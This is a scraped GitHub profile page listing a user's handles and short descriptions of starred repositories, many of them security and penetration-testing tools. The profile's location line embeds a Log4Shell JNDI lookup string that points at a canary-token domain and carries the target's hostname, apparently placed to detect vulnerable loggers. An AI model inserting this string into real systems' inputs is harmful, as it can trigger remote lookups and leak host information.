
- Boston, MA
-
01:19
- 5h behind - ${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytokens.com/a}
- @JLLeitschuh
- @JLLeitschuh@infosec.exchange
Highlights
Lists (6)
Sort Name ascending (A-Z)
Starred repositories
Command-line program to download videos from YouTube.com and other video sites
Magnificent app which corrects your previous console command.
π‘ Open source home automation that puts local control and privacy first.
A collection of learning resources for curious software engineers
The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data.
Fast subdomains enumeration tool for penetration testers
Reads key-value pairs from a .env file and can set them as environment variables. It helps in developing applications following the 12-factor principles.
Typed interactions with the GitHub API v3
open-source jailbreaking tool for many iOS devices
"Can I take over XYZ?" β a list of services and how to claim (sub)domains with dangling DNS records.
Codemod is a tool/library to assist you with large-scale codebase refactors that can be partially automated but still require human oversight and occasional intervention. Codemod was developed at Fβ¦
Automatic Ripping Machine (ARM) Scripts
Automatic SSRF fuzzer and exploitation tool
π Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys.
A social coding experiment that updates its own code democratically.
Using speech-to-text to fully check out during con calls
Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
π Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources
Open-source vulnerability disclosure and bug bounty program database
Differential fuzzing REPL for HTTP implementations.
π π GuardDog is a CLI tool to Identify malicious PyPI and npm packages
GitHub Actions Pipeline Enumeration and Attack Tool